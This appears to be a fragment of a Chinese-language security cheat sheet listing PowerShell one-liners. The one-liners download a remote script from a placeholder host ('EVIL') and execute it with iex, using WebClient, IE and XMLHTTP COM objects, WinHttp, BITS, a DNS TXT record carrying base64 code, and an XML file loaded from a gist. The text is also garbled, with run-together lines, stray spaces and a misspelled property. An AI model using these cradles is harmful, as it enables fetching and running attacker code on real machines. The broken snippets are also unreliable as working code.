IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")IEX (iwr 'http://EVIL/evil.ps1')$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
$h=New-Object -ComObject Msxml2.XMLHTTP$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
$ h = new-object -com WinHttp.WinHttpRequest.5.1;$ h.open('GET',' http://EVIL/evil.ps1',$false);$ h.send();iex $ h.qesponseText
Import-Module bitstransfer;Start-BitsTransfer'http ://EVIL/evil.ps1'$ env:temp \ t;$ r = gc $ env:temp \ t; rm $ env:tempt;iex $ r
要执行的代码必须是存储在TXT记录中的base64编码的字符串
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))<#<?xml version="1.0"?><command><a><execute>Get-Process</execute></a></command>#>$a = New-Object System.Xml.XmlDocument$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")$a.command.a.execute | iex
推荐阅读